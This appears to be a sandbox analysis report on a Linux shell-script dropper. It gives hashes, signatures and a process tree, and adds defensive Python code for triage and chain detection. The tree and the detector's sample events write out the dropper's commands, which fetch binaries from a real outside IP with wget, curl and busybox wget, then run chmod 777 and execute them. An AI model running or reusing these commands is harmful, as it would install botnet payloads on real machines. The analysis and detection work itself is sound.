Analysis
max time kernel: 71s
max time network: 76s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 24/11/2024, 02:06

Static task: static1
Behavioral task behavioral1: sample 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh, resource debian9-mipsbe-20240729-en
Behavioral task behavioral4: sample 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh, resource debian9-mipsel-20240611-en

The same shell script was submitted to four behavioral tasks covering amd64, armhf, mipsbe and mipsel. The platform and resource fields above identify the signatures and process tree on this page as the behavioral2 (debian9-armhf) run.
General
Target: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Size: 10KB
MD5: f9ec55ea475d5bf2658f26f7f7280c34
SHA1: 223f1daef72dbab6429966084f88ef60a26414c0
SHA256: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
SHA512: 1eed0d4a83f257ce571b39a36402dcb8f57e8472144723dddd8f818dcdc12822d4fa9b2db7082665fd82ad30ab790dd8bafa0c7932ba13c04651e782f53953aa
SSDEEP: 192:EJ/5zEEuzm7PVm+Dgxbw4STnf777PVm+/EEuzufw4STnKjo:y/5v7PVm+DgxMv7PVm+Bo
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 24 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod. PIDs: 693, 709, 725, 744, 763, 770, 784, 802, 821, 829, 835, 841, 847, 855, 861, 869, 875, 881, 887, 893, 901, 907, 913, 919. Each one is a "chmod 777" on a freshly fetched payload (see the process tree), so the mode is world-writable as well as executable.

Executes dropped EXE (24 IoCs)
Every fetched file is executed from /tmp under its own name. Fourteen distinct names are run; the last ten of them are fetched and run a second time, which gives the 24 entries below (ioc, PID):
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ  694
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT  710
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s  726
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4  746
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk  764
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m  771
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q  785
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM  803
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5  822
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv  830
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj  836
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI  842
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh  849
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy  856
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5  862
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk  870
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m  876
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q  882
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM  888
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv  894
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy  902
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj  908
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI  914
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh  920
Caveat: the Downloads section at the end of this page records a single 153-byte file, so it is unlikely that the /bins/ payloads were actually served in this run. Read these 24 entries as execution attempts of whatever curl wrote to /tmp, not as proof that a bot binary ran.

Checks CPU configuration (1 TTP, 24 IoCs)
Checks CPU information, which can indicate whether the system is a virtual machine.
File opened for reading: /proc/cpuinfo, by curl, 24 times (once per curl invocation in the process tree).
Caveat: all 24 reads are attributed to curl, never to the script or to the dropped files. A downloader reading /proc/cpuinfo at start-up is consistent with CPU-feature probing by its crypto/TLS libraries on ARM, so this hit says something about the tool the script calls, not about evasion logic in the sample.

Reads runtime system information (48 IoCs; the heading was lost in extraction and is restored from the process-tree tags)
File opened for reading: /proc/sys/crypto/fips_enabled, by curl, 24 times.
File opened for reading: /proc/self/auxv, by curl, 24 times.
Caveat: as with /proc/cpuinfo, these are library initialisation reads inside curl (a FIPS-mode check and the auxiliary vector) and carry no signal about the sample itself.

Writes file to tmp directory (24 IoCs)
Malware often drops required files in the /tmp directory.
File opened for modification, by curl (count in brackets where the name is fetched twice):
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk (x2)
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m (x2)
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q (x2)
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM (x2)
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 (x2)
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv (x2)
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj (x2)
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI (x2)
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh (x2)
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy (x2)
The sandbox attributes every /tmp write to curl; the wget and busybox wget invocations for the same names produced no file-write IoC in this run.
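Added example (not part of the sandbox report above and not the sample's own code): a small Python triage helper that looks for the two artefacts this dropper leaves on a live host. The rm step means a payload that is still running shows up as /proc/<pid>/exe pointing at "/tmp/<name> (deleted)", and the chmod step leaves any file the rm missed with mode 0777. Assumptions: a Linux procfs layout, /tmp as the staging directory (taken from the "Writes file to tmp directory" signature), and the fake /proc and /tmp fixture that build_demo_tree creates, which is constructed for the demonstration and uses names and PIDs from this report.

```python
import os
import stat
import tempfile

DELETED = " (deleted)"


def find_deleted_exec_processes(proc_root="/proc"):
    """Processes whose executable was unlinked after they started. The dropper above
    runs each payload from /tmp and rm's it at once, so a surviving bot shows up as
    /proc/<pid>/exe -> '/tmp/<name> (deleted)'. Returns sorted (pid, original path)."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue                                  # /proc/sys, /proc/self, ...
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue                                  # kernel thread, exited, or EACCES
        if target.endswith(DELETED):
            hits.append((int(entry), target[: -len(DELETED)]))
    return sorted(hits)


def find_mode_0777_files(directory="/tmp"):
    """Regular files left with mode 0777, the exact mode the script's chmod step sets
    (chmod PIDs 693..919 above). Symlinks are ignored (lstat)."""
    hits = []
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        try:
            st = os.lstat(path)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and stat.S_IMODE(st.st_mode) == 0o777:
            hits.append(path)
    return sorted(hits)


def build_demo_tree(root):
    """Constructed fixture (not real host data): a fake /proc and /tmp shaped like the
    state this dropper leaves behind. Names come from the report; the PIDs of the two
    surviving processes match 'Executes dropped EXE' entries."""
    proc, tmp = os.path.join(root, "proc"), os.path.join(root, "tmp")
    os.makedirs(tmp)
    fake_procs = [
        (1, "/sbin/init"),                                                # normal
        (694, "/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ (deleted)"),       # payload 1
        (710, "/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT (deleted)"),       # payload 2
        (922, "/usr/bin/wget"),                                           # normal
    ]
    for pid, exe in fake_procs:
        os.makedirs(os.path.join(proc, str(pid)))
        os.symlink(exe, os.path.join(proc, str(pid), "exe"))
    os.makedirs(os.path.join(proc, "sys"))            # non-PID entry, must be skipped
    leftover = os.path.join(tmp, "RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4")
    with open(leftover, "wb") as f:
        f.write(b"\x7fELF")                           # header only, not a real binary
    os.chmod(leftover, 0o777)
    benign = os.path.join(tmp, "notes.txt")
    with open(benign, "w") as f:
        f.write("benign\n")
    os.chmod(benign, 0o644)
    return proc, tmp


def triage_demo():
    """Build the fixture in a temp dir and run both checks against it."""
    proc, tmp = build_demo_tree(tempfile.mkdtemp(prefix="dropper-triage-"))
    return {"deleted_exec": find_deleted_exec_processes(proc),
            "mode_0777": [os.path.basename(p) for p in find_mode_0777_files(tmp)]}


if __name__ == "__main__":
    print(triage_demo())   # on a live host call find_*("/proc") and find_*("/tmp") directly
```

Run the real checks as root: /proc/<pid>/exe of another user's process is unreadable and is silently skipped. A "(deleted)" executable is also what a daemon looks like after its package was upgraded in place, so judge by the path: /tmp, /var/tmp or /dev/shm is the signal, /usr/sbin after an apt run is not.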
Processes
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh  (depth 1, PID 659)
  /bin/rm bins.sh  (depth 2, PID 664)

Every other child sits at depth 2 directly under the script. The script runs the same six-step sequence for each payload name N, always against the same host and URL prefix; the signature tags the sandbox attached to each step are shown in brackets:

  /usr/bin/wget   wget http://216.126.231.240/bins/N
  /usr/bin/curl   curl -O http://216.126.231.240/bins/N        [Checks CPU configuration, Reads runtime system information, Writes file to tmp directory]
  /bin/busybox    /bin/busybox wget http://216.126.231.240/bins/N
  /bin/chmod      chmod 777 N                                   [File and Directory Permissions Modification]
  /tmp/N          ./N                                           [Executes dropped EXE]
  /bin/rm         rm N

PIDs per payload, in execution order (columns: wget, curl, busybox wget, chmod 777, ./N, rm):

   1  fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ   669  691  692  693  694  695
   2  7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT   696  701  706  709  710  711
   3  3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s   713  717  722  725  726  727
   4  RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4   729  733  739  744  746  747
   5  DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk   748  754  760  763  764  765
   6  8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m   766  768  769  770  771  772
   7  LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q   773  775  780  784  785  786
   8  ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM   787  792  799  802  803  804
   9  BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5   805  810  817  821  822  823
  10  Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv   824  826  828  829  830  831
  11  DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj   832  833  834  835  836  837
  12  3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI   838  839  840  841  842  843
  13  6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh   844  845  846  847  849  850
  14  RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy   852  853  854  855  856  857
  15  BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5   858  859  860  861  862  863
  16  DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk   864  865  868  869  870  871
  17  8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m   872  873  874  875  876  877
  18  LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q   878  879  880  881  882  883
  19  ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM   884  885  886  887  888  889
  20  Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv   890  891  892  893  894  895
  21  RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy   896  898  900  901  902  903
  22  DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj   904  905  906  907  908  909
  23  3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI   910  911  912  913  914  915
  24  6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh   916  917  918  919  920  921
  25  RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4   922  (wget only; the run ended at this point)

Rows 15 to 24 are a second pass over ten of the fourteen names from rows 1 to 14, and row 25 is the start of another pass cut off by the 71-second kernel time limit. Three different download tools are tried for every name so that at least one exists on the target; the files are executed by relative path from /tmp and removed immediately afterwards.
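Added example, not code from the report or from the sample: a Python detector that replays process-creation records of the shape shown in the tree above ((pid, command line) in execution order), raises one finding per completed fetch, chmod +x, execute chain, and extracts network and file IOCs from the findings. The sample events are copied from the tree for two payload iterations (one name fetched twice), the unfinished final wget, plus a hypothetical benign decoy (a curl of a Debian source tarball followed by chmod 644, PIDs 1000 and 1001, invented for the test) that must not match. The /tmp prefix used for dropped paths is an assumption taken from the "Writes file to tmp directory" signature; on a real host take the working directory from the event source instead.

```python
import re
from urllib.parse import urlparse

# Constructed input: (pid, command line) records copied from the process tree above,
# plus a hypothetical benign decoy (PIDs 1000-1001) that must not be reported.
SAMPLE_EVENTS = [
    (664, "/bin/rm bins.sh"),
    (669, "wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ"),
    (691, "curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ"),
    (692, "/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ"),
    (693, "chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ"),
    (694, "./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ"),
    (695, "rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ"),
    (805, "wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (810, "curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (817, "/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (821, "chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (822, "./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (823, "rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (858, "wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (859, "curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (860, "/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (861, "chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (862, "./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (863, "rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5"),
    (922, "wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4"),
    (1000, "curl -O https://deb.debian.org/debian/pool/main/h/hello/hello_2.10.orig.tar.gz"),
    (1001, "chmod 644 hello_2.10.orig.tar.gz"),
]

URL_RE = re.compile(r"""https?://[^\s'"]+""")
FETCH_RE = re.compile(r"^(?:(?:/usr/bin/)?(?:wget|curl)|(?:/bin/)?busybox\s+wget)\b")
CHMOD_RE = re.compile(r"^(?:/bin/)?chmod\s+(\S+)\s+(\S+)$")   # plain "chmod MODE FILE" only
EXEC_RE = re.compile(r"^\./(\S+)$")
RM_RE = re.compile(r"^(?:/bin/)?rm\s+(?:-\S+\s+)*(\S+)$")


def classify(cmdline):
    """Map one command line to (stage, filename, extra), or None if it is not a chain step."""
    cmd = cmdline.strip()
    if FETCH_RE.match(cmd):
        m = URL_RE.search(cmd)
        return ("fetch", m.group(0).rsplit("/", 1)[-1], m.group(0)) if m else None
    m = CHMOD_RE.match(cmd)
    if m:
        mode, name = m.groups()
        # 777 (this sample) and symbolic +x both add an execute bit; 644 does not
        executable = (mode.isdigit() and (int(mode, 8) & 0o111) != 0) or "x" in mode
        return ("chmod", name, mode) if executable else None
    m = EXEC_RE.match(cmd)
    if m:
        return ("exec", m.group(1), None)
    m = RM_RE.match(cmd)
    if m:
        return ("rm", m.group(1), None)
    return None


def detect_dropper_chains(events):
    """Replay (pid, cmdline) records in order; return one dict per filename that was
    fetched, made executable and executed. rm closes a chain, so a name fetched again
    later (the second pass in the tree above) starts a new one instead of overwriting."""
    chains, open_chains = [], {}
    for pid, cmd in events:
        hit = classify(cmd)
        if hit is None:
            continue
        stage, name, extra = hit
        if stage == "fetch":
            chain = open_chains.get(name)
            if chain is None:
                chain = {"name": name, "urls": [], "fetch_pids": [],
                         "chmod_pid": None, "exec_pid": None, "rm_pid": None}
                chains.append(chain)
                open_chains[name] = chain
            chain["urls"].append(extra)
            chain["fetch_pids"].append(pid)
            continue
        chain = open_chains.get(name)
        if chain is None:
            continue                      # chmod/exec/rm of a file we never saw fetched
        if stage == "rm":
            chain["rm_pid"] = pid
            del open_chains[name]         # cleanup step ends the chain
        else:
            chain[stage + "_pid"] = pid   # "chmod_pid" or "exec_pid"
    return [c for c in chains if c["chmod_pid"] and c["exec_pid"]]


def extract_iocs(chains, workdir="/tmp"):
    """Network and file IOCs from detected chains. workdir is an assumption taken from
    the report (bare names are written under /tmp); read it from the event source."""
    urls = sorted({u for c in chains for u in c["urls"]})
    return {"hosts": sorted({urlparse(u).hostname for u in urls}),
            "urls": urls,
            "dropped_paths": sorted({f"{workdir}/{c['name']}" for c in chains})}


if __name__ == "__main__":
    found = detect_dropper_chains(SAMPLE_EVENTS)
    print(*found, extract_iocs(found), sep="\n")
```

The rm step closes a chain, so the second fetch of BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 (PIDs 858 to 863 above) is reported as its own finding rather than overwriting the first. A fetch that is never followed by chmod and execution (the benign decoy, and the trailing wget for RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 at PID 922) produces nothing. Feeding the detector auditd execve records or EDR process events only needs an adapter that yields (pid, cmdline) tuples in time order.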
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97